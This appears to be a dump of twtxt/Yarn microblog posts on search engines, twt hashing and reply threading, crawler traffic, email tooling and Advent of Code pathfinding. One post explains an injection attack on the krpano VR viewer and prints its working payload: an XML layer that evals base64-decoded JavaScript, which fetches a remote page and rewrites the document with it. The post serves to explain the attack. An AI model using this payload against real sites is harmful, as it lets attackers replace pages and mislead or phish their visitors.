@prologic@twtxt.net If this develops (and I'm not saying it will happen soon), perhaps Yarn could be connected as an additional node. Implementing it would not be difficult for any client or software. It would not only be a backup of twtxt, but also a source for search, discovery, and network health.

Google, DuckDuckGo massively expand “AI” search results

Clearly, online search isn’t bad enough yet, so Google is intensifying its efforts to continue speedrunning the downfall of Google Search. They’ve announced they’re going to show even more “AI”-generated answers in Search results, to more people. Today, we’re sharing that we’ve launched Gemini 2.0 for AI Overviews in the U.S. to help with harder questions, starting with coding, advanced math and multimodal queries, with mor … ⌘ Read more

looks good to me!

About alice's hash: using SHA-256, I get 96473b4f (or 96473B4F) for the last 8 characters. I'll add it as an implementation example.

The idea of including it next to the follow URL is to avoid recalculating it every time we load the file (assuming the client computed it correctly), and it makes tracking replies across the file a matter of a simple search.

Also, looking at your example, I now think that instead of {url=96473B4F,id=1}, which is ambiguous about which URL we are referring to, it could be something like:

{reply_to=[URL_HASH]_[TWT_ID]} / {reply_to=96473B4F_1}

That way, the ‘full twt ID’ could be 96473B4F_1.

@prologic@twtxt.net Of course you don't notice it when yarnd only shows at most the last n messages of a feed. As an example, check out mckinley's message from 2023-01-09T22:42:37Z. It has “[Scheduled][Scheduled][Scheduled]”… in it. This text in square brackets is repeated numerous times. If you search his feed for a closing square bracket followed by an opening square bracket (][), you will find a bunch more of these. It goes without saying that he never typed that into his feed. My client saves the hash of each twt I've explicitly marked as read. A few days ago, I got plenty of apparently years-old, yet suddenly unread, messages. Every single one of them contained this repeated bracketed text. The only conclusion is that something messed up the feed again.

@prologic@twtxt.net @xuu@txt.sour.is There:

Just search for ][ in https://twtxt.net/user/mckinley/twtxt.txt and you’ll see.

reviewing logs this morning and found i have been spammed hard by bots not respecting the robots.txt file. only noticed it because the OpenAI bot was hitting me with a lot of nonsensical requests. here is the list from last month:

- (810) bingbot

- (641) Googlebot

- (624) http://www.google.com/bot.html

- (545) DotBot

- (290) GPTBot

- (106) SemrushBot

- (84) AhrefsBot

- (62) MJ12bot

- (60) BLEXBot

- (55) wpbot

- (37) Amazonbot

- (28) YandexBot

- (22) ClaudeBot

- (19) AwarioBot

- (14) https://domainsbot.com/pandalytics

- (9) https://serpstatbot.com

- (6) t3versionsBot

- (6) archive.org_bot

- (6) Applebot

- (5) http://search.msn.com/msnbot.htm

- (4) http://www.googlebot.com/bot.html

- (4) Googlebot-Mobile

- (4) DuckDuckGo-Favicons-Bot

- (3) https://turnitin.com/robot/crawlerinfo.html

- (3) YandexNews

- (3) ImagesiftBot

- (2) Qwantify-prod

- (1) http://www.google.com/adsbot.html

- (1) http://gais.cs.ccu.edu.tw/robot.php

- (1) YaK

- (1) WBSearchBot

- (1) DataForSeoBot

i have placed some middleware to reject these for now, but it is not a foolproof solution.
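One way to build such middleware in Go is a net/http wrapper that checks the User-Agent header. This is a sketch, not the middleware described above: the blocklist is an illustrative subset of the names in the list, matching is a case-insensitive substring test, and /robots.txt is still served so that well-behaved crawlers can read it:

```go
package main

import (
	"log"
	"net/http"
	"strings"
)

// blockedAgents is an illustrative subset of crawler names from the list;
// entries are lowercase because matching lowercases the User-Agent first.
var blockedAgents = []string{
	"gptbot", "claudebot", "semrushbot", "ahrefsbot",
	"dotbot", "mj12bot", "blexbot", "amazonbot",
}

// isBlocked reports whether the User-Agent contains any blocked name.
func isBlocked(ua string) bool {
	ua = strings.ToLower(ua)
	for _, b := range blockedAgents {
		if strings.Contains(ua, b) {
			return true
		}
	}
	return false
}

// blockBots wraps a handler and answers 403 Forbidden for blocked agents,
// except on /robots.txt.
func blockBots(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if r.URL.Path != "/robots.txt" && isBlocked(r.UserAgent()) {
			http.Error(w, "Forbidden", http.StatusForbidden)
			return
		}
		next.ServeHTTP(w, r)
	})
}

func main() {
	mux := http.NewServeMux()
	mux.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
		w.Write([]byte("hello\n"))
	})
	log.Fatal(http.ListenAndServe(":8080", blockBots(mux)))
}
```

Since the User-Agent header is entirely client-controlled, a bot can evade this by sending a browser-like string, which is one reason this kind of filter is not foolproof.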

Well, that’s another bug: The search https://twtxt.net/search?q=%22LOOOOL%2C+great+programming+tutorial+music%22 yields the wrong hash. It should have been poyndha instead.

Reading “Man's Search for Meaning” by Viktor E. Frankl

Unit Circle

⌘ Read more

@slashdot@feeds.twtxt.net Who the F+++ still uses goo’s search engine anyway xD Shout out to all my homies hosting a Searx instance 😂🤘

Google begins requiring JavaScript for Google Search

Google says it has begun requiring users to turn on JavaScript, the widely used programming language to make web pages interactive, in order to use Google Search. In an email to TechCrunch, a company spokesperson claimed that the change is intended to “better protect” Google Search against malicious activity, such as bots and spam, and to improve the overall Google Search experience for users. The spokesperson noted that, with … ⌘ Read more

Google Begins Requiring JavaScript For Google Search

Google says it has begun requiring users to turn on JavaScript, the widely-used programming language to make web pages interactive, in order to use Google Search. From a report: In an email to TechCrunch, a company spokesperson claimed that the change is intended to “better protect” Google Search against malicious activity, such as bots and spam, and to improve the over … ⌘ Read more

So this works by injecting unrestricted JavaScript that the KRPano VR media viewer autoloads.

The xml parameter points to a URL that serves the following:

```xml
<?xml version="1.0"?>
<krpano version="1.0.8.15">
  <SCRIPT id="allow-copy_script"/>
  <layer name="js_loader" type="container" visible="false" onloaded="js(eval(var w=atob('... OMIT ...');eval(w)););"/>
</krpano>
```

The omitted part above is the following base64-encoded script:

```javascript
const queryParams = new URLSearchParams(window.location.search),
  id = queryParams.get('id');

id ? fetch('https://sour.is/superhax.txt')
    .then(e => e.text())
    .then(e => {
      document.open(), document.write(e), document.close();
    })
    .catch(e => {
      console.error('Error fetching the user agent:', e);
    }) : console.error('No');
```

If the page URL has an id query parameter, this script fetches the text at https://sour.is/superhax.txt and replaces the entire document content with it.

@lime360@lime360.nekoweb.org Down at the moment due to hardware failure of one of my nodes. I have the spare parts to bring it back online, just need to find the time 😅 Sorry for the inconvenience, I just can’t afford to run the search engine right now on the remaining two nodes 😢😢

@prologic@twtxt.net uhhh what happened to search.twtxt.net

nice! would you mind elaborating a bit?

Is that the scientific method?

I couldn’t find anything related when I searched for it.

@andros@twtxt.andros.dev Sorry I missed your messages to #twtxt on IRC. There are people there, but it can take several hours to get a response. E.g. I check it every day or two. I recommend using an IRC bouncer. To answer your question about registries, I used a couple of registries when I first started out, to try to find feeds to follow, but haven’t since then. I don’t remember which ones, but they were easy to find with web searches.

@prologic@twtxt.net Is it possible to interact with twtxt.net from outside? For example, a search API

I remembered one ISP that disallows IRC on its servers. By searching, I found that many ISPs equate IRC with proxies and doorways. This is unfair!

clearly forgot to add my twtxt feed on search.twtxt.net but now here i am hello hi

… it even shows @sorenpeter@darch.dk’s article from 2020 in search results

@prologic@twtxt.net I cannot… believe… It took me a “Single Search Query” to get HOOKED!! 🤩 Bonus: tried it from terminal too and it works just 👌

Behold … “Marginalia”! My new favorite search engine!! And I have @mattof to thank for this find. Here's their blog post about it, since I don't think I could do a better job describing what it is. But, tl;dr: it's a #smallweb focused search engine.

The web is such garbage these days 😔 Or is it the garbage search engines? 🤔

@Codebuzz@www.codebuzz.nl I have separate mail boxes for private and work, but flattened both to have a simpler structure. For work, where we use Outlook, I am using categories for organising the mails and privately I am using Vivaldi’s labels system. The main idea is to use search and grouping through dynamic saved searches instead of static folders.

So I've flattened my work and private email inboxes to single inbox folders, and I don't even know anymore what I was thinking before, frantically trying to organise everything in subfolders. Labels and search filters are the way forward.

I'm pretty sure I wrote up an algorithm for it at some point; I think it is lost in a git comment someplace. I'll put together some pseudo/Go code this week.

Super simple:

Making a reply:

- If yarn has one, use that. (Maybe do a collision check?)

- Make a hash of the raw twt, with no truncation.

- Check the local cache for the shortest prefix without a collision.

  - In SQL: `select len(subject) where head_full_hash like subject || '%'`

Threading:

- Get the full hash of the head twt.

- Search for twts.

  - In SQL: `head_full_hash like subject || '%' and created_on > head_timestamp`

The assumption is that replies will be to the most recent head. If replying to an older one, the client will use a longer hash.

Diving into mblaze, I think I've nearly* reached peak email geek.

Just a bunch of shell commands I can pipe together to search, list, view and reply to email (after syncing it to a local Maildir).

EXAMPLES at https://git.vuxu.org/mblaze/tree/README

So far I’m using most of the tools directly from the command line, but I might take inspiration from https://sr.ht/~rakoo/omail/ to make my workflow a bit more efficient.

*To get any closer, I think I’d have to hand-craft my own SMTP client or something.

@movq@www.uninformativ.de Yes, the tools are surprisingly fast. Still, magrep takes about 20 seconds to search through my archive of 140K emails, so to speed things up I would probably combine it with an indexer like mu, mairix or notmuch.

So in a location-based system, how exactly do I reply to one of these two Twts from @Yarns@search.twtxt.net ? 🤔

2024-09-07T12:55:56Z 🥳 NEW FEED: @<twtxt http://edsu.github.io/twtxt/twtxt.txt>

2024-09-07T12:55:56Z 🥳 NEW FEED: @<kdy https://twtxt.kdy.ch/twtxt.txt>

@falsifian@www.falsifian.org Comments on the feeds, as in nick, url, follow, that kind of thing? If so, then I'm not interested at all. I envision an archive that would allow searching, and potentially browsing threads, in a nice, neat interface. You will have to think about other things, though. Like, what to do with images? Yarn lets users upload images, but also embed images from other sources in their twts (hotlinking, actually).

@prologic@twtxt.net I believe you when you say registries as designed today do not crawl. But when I first read the spec, it conjured in my mind a search engine. Now I don’t know how things work out in practice, but just based on reading, I don’t see why it can’t be an API for a crawling search engine. (In fact I don’t see anything in the spec indicating registry servers shouldn’t crawl.)

(I also noticed that https://twtxt.readthedocs.io/en/latest/user/registry.html recommends “The registries should sync each others user list by using the users endpoint”. If I understood that right, registering with one should be enough to appear on others, even if they don’t crawl.)

Does yarnd provide an API for finding twts? Is it similar?

@prologic@twtxt.net I guess I thought they were search engines. Anyway, the registry API looks like a decent one for searching for tweets. Could/should yarn.social pods implement the same API?

@prologic@twtxt.net What’s the difference between search.twtxt.net and the /api/plain/tweets endpoint of a registry? In my mind, a registry is a twtxt search engine. Or are registries not supposed to do their own crawling to discover new feeds?
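For comparison, querying a registry could look like this in Go. A sketch assuming the registry answers GET /api/plain/tweets?q=... with one result per line as tab-separated nick, URL, RFC 3339 timestamp, and text (my reading of the registry docs linked above; check them before relying on it). registry.example.org is a placeholder and the helper names are hypothetical:

```go
package main

import (
	"bufio"
	"fmt"
	"net/url"
	"strings"
	"time"
)

// RegistryTwt is one result line from a registry's /api/plain/tweets.
type RegistryTwt struct {
	Nick, URL string
	Created   time.Time
	Text      string
}

// tweetsURL builds <base>/api/plain/tweets?q=<query>.
func tweetsURL(base, query string) string {
	v := url.Values{}
	v.Set("q", query)
	return strings.TrimRight(base, "/") + "/api/plain/tweets?" + v.Encode()
}

// parseTweets parses "nick<TAB>url<TAB>timestamp<TAB>text" lines.
func parseTweets(body string) ([]RegistryTwt, error) {
	var out []RegistryTwt
	sc := bufio.NewScanner(strings.NewReader(body))
	for sc.Scan() {
		f := strings.SplitN(sc.Text(), "\t", 4)
		if len(f) != 4 {
			continue // skip blank or malformed lines
		}
		ts, err := time.Parse(time.RFC3339, f[2])
		if err != nil {
			return nil, err
		}
		out = append(out, RegistryTwt{Nick: f[0], URL: f[1], Created: ts, Text: f[3]})
	}
	return out, sc.Err()
}

func main() {
	fmt.Println(tweetsURL("https://registry.example.org", "twtxt"))
}
```

Fetching is left out so the sketch runs offline; passing the tweetsURL result to http.Get and the response body to parseTweets would complete it.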

Never mind, I simply searched and deleted them all (D then ~f sender). :-) Phew!

s/(www\.)?youtube\.com\/watch\?v=([^&]+)/tubeproxy.mills.io\/play\/\2/ for example? 🤔
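The same rewrite in Go, as a sketch: the dots and the ? are escaped so they match literally, the video ID is captured in its own group and reused, and any trailing &... parameters are dropped. It assumes tubeproxy.mills.io/play/ takes a bare video ID, and it only handles links where v is the first query parameter:

```go
package main

import (
	"fmt"
	"regexp"
)

// ytWatch matches youtube.com/watch?v=ID (optional "www."), captures the ID,
// and swallows any further "&..." parameters up to the next whitespace.
var ytWatch = regexp.MustCompile(`(?:www\.)?youtube\.com/watch\?v=([A-Za-z0-9_-]+)(?:&\S*)?`)

// toTubeproxy rewrites YouTube watch links to tubeproxy.mills.io/play/ID,
// keeping any scheme and surrounding text unchanged.
func toTubeproxy(s string) string {
	return ytWatch.ReplaceAllString(s, "tubeproxy.mills.io/play/${1}")
}

func main() {
	fmt.Println(toTubeproxy("see https://www.youtube.com/watch?v=dQw4w9WgXcQ&t=42 lol"))
}
```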

Have not tried any of them, but some of these seem to fit the bill:

@movq@www.uninformativ.de I’ve been using Qwant for a while but it was down earlier today (as well 😆) so I switched back to my trusty Searx Redirector

… This utility forwards your search query to one of 11 random volunteer-run public servers to thwart mass surveillance.

QOTD: Which web search engine do you use? 😂



Hah 🤣 @dfaria@twtxt.net Your @dfaria.eu@dfaria.eu feed really does take up well over 50% of a “Discover” search with the filters “Without replies” and “Hide my posts”. 🤣

36/2 = 18 out of 25 Twts per page, so that's ~72% of the search/view real estate you're taking up! wow 🤩 – I'd be very interested to hear any ideas you have to improve this. Those search filters were created so you could easily sift through either your own Timeline or the Discover view.



Added support for #tag clouds and #search to timeline. Based on code from @dfaria.eu@dfaria.eu🙏

Live at: http://darch.dk/timeline/?profile=https://darch.dk/twtxt.txt

You come across the strangest things… Here, lots of books in plain-text format: https://github.com/ganesh-k13/shell/tree/master/test_search/www.glozman.com/TextPages

Google Chrome Gains AI Features Including a Writing Helper

Google is adding new AI features to Chrome, including tools to organize browser tabs, customize themes, and assist users with writing online content such as reviews and forum posts.

The writing helper is similar to an AI-powered feature already offered in Google’s experimental search experience, SGE, which helps users draft emails in various tones and lengths. W … ⌘ Read more

So, I finally got day 17 to under a second on my machine (in the test runner, it takes 10 seconds).

I replaced the priority queue with a Fibonacci heap, to great success.

https://git.sour.is/xuu/advent-of-code/src/branch/main/search.go#L168-L268

OH MY FREAKING HECK. So... I made my pather able to run as Dijkstra, or as A* if the interface includes a heuristic... and when I tried it without the heuristic, it finished faster :|

So now to figure out why it's not working right.
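A sketch of that kind of pather in Go, using generics: ShortestPath runs as Dijkstra by default and switches to A* when the graph also implements an optional Heuristic interface, detected with a type assertion. It uses a binary heap from container/heap, not a Fibonacci heap, and all type and function names are hypothetical, not taken from the linked search.go:

```go
package main

import (
	"container/heap"
	"fmt"
)

type Edge[N comparable] struct {
	To   N
	Cost int
}

// Graph is the minimal interface the search needs.
type Graph[N comparable] interface {
	Neighbours(n N) []Edge[N]
}

// Heuristic is optional; if the graph implements it, the search runs as A*.
type Heuristic[N comparable] interface {
	Estimate(from, goal N) int
}

type item[N comparable] struct {
	node N
	cost int // g: cost so far
	prio int // f = g + h (h is 0 for Dijkstra)
}

type pq[N comparable] []item[N]

func (q pq[N]) Len() int           { return len(q) }
func (q pq[N]) Less(i, j int) bool { return q[i].prio < q[j].prio }
func (q pq[N]) Swap(i, j int)      { q[i], q[j] = q[j], q[i] }
func (q *pq[N]) Push(x any)        { *q = append(*q, x.(item[N])) }
func (q *pq[N]) Pop() any {
	old := *q
	it := old[len(old)-1]
	*q = old[:len(old)-1]
	return it
}

// ShortestPath returns the cost from start to goal, or -1 if unreachable.
func ShortestPath[N comparable](g Graph[N], start, goal N) int {
	h := func(N) int { return 0 } // Dijkstra by default
	if hg, ok := g.(Heuristic[N]); ok {
		h = func(n N) int { return hg.Estimate(n, goal) }
	}
	best := map[N]int{start: 0}
	q := &pq[N]{{node: start, cost: 0, prio: h(start)}}
	for q.Len() > 0 {
		cur := heap.Pop(q).(item[N])
		if cur.node == goal {
			return cur.cost
		}
		if cur.cost > best[cur.node] {
			continue // stale queue entry
		}
		for _, e := range g.Neighbours(cur.node) {
			nc := cur.cost + e.Cost
			if old, seen := best[e.To]; !seen || nc < old {
				best[e.To] = nc
				heap.Push(q, item[N]{node: e.To, cost: nc, prio: nc + h(e.To)})
			}
		}
	}
	return -1
}

// point and grid form a toy 4-connected grid with unit step costs; grid
// implements Heuristic via Manhattan distance, so it is searched with A*.
type point struct{ x, y int }
type grid struct{ w, h int }

func (g grid) Neighbours(p point) []Edge[point] {
	var out []Edge[point]
	for _, d := range []point{{1, 0}, {-1, 0}, {0, 1}, {0, -1}} {
		n := point{p.x + d.x, p.y + d.y}
		if n.x >= 0 && n.y >= 0 && n.x < g.w && n.y < g.h {
			out = append(out, Edge[point]{To: n, Cost: 1})
		}
	}
	return out
}

func (g grid) Estimate(a, b point) int { return abs(a.x-b.x) + abs(a.y-b.y) }

func abs(v int) int {
	if v < 0 {
		return -v
	}
	return v
}

// plain has no heuristic, so it is searched with Dijkstra.
type plain map[string][]Edge[string]

func (p plain) Neighbours(n string) []Edge[string] { return p[n] }

func main() {
	fmt.Println(ShortestPath[point](grid{5, 5}, point{0, 0}, point{4, 4}))
	g := plain{"a": {{"b", 1}, {"c", 4}}, "b": {{"c", 1}}}
	fmt.Println(ShortestPath[string](g, "a", "c"))
}
```

On the toy grid, Manhattan distance is admissible and consistent, so returning on the first pop of the goal gives the optimal cost.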

man… day17 has been a struggle for me.. i have managed to implement A* but the solve still takes about 2 minutes for me.. not sure how some are able to get it under 10 seconds.

Solution: https://git.sour.is/xuu/advent-of-code/src/branch/main/day17/main.go

A* PathFind: https://git.sour.is/xuu/advent-of-code/src/branch/main/search.go

some seem to simplify the seen check to only be horizontal/vertical instead of each direction.. but it doesn’t give me the right answer